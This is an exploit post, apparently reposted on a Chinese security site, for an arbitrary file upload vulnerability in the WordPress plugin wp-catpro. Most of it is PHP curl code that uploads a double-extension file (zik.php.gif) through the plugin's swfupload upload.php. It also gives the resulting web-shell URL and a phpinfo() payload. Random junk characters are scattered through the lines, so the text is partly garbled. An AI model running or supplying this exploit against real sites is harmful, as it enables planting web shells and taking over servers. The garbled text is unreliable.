WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
$ h& L& ]6 d0 B) K. a, i  t#-----------------------------------------------------------------------

作者  => Zikou-16
8 t' X0 \) Q# X1 Q+ v邮箱 => zikou16x@gmail.com
) r  A2 q( a  T7 R7 O2 U: ?测试系统 : Windows 7 , Backtrack 5r3
, X) }: x4 n0 E+ j. s' [* r4 ?4 i) B下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
0 U  R4 U  }' d4 P####

#=> Exploit 信息:
5 k: z( H& k' x: P& \/ a------------------
) E* D  u8 z- ?$ d! j# 攻击者可以上传 file/shell.php.gif
: C0 S, C# b8 m2 d# Z7 V% ]% ?! z# ("jpg", "gif", "png")  // Allowed file extensions
% ^2 A3 @6 o9 p. |0 ]# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
- c4 l9 W2 F) H0 i; `------------------

#=> Exploit
/ U/ }; _" d: G& ^8 f, ~-----------
<?php

; P' j' @- L! D& R9 J9 j$uploadfile="zik.php.gif";
. @& |# I1 C& n3 S1 v$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
9 R; m' \8 E( V7 u- Warray('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
$ D. M8 \. k# R5 d& s4 |curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
, R( s- u- _1 ?% ]( I' V$postResult = curl_exec($ch);
curl_close($ch);

: |! w3 W1 v! F) q8 u( O+ ~print "$postResult";

Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
  ?>
<?php
3 g& `7 @6 q( p  F- @- Q. A" Sphpinfo();
?>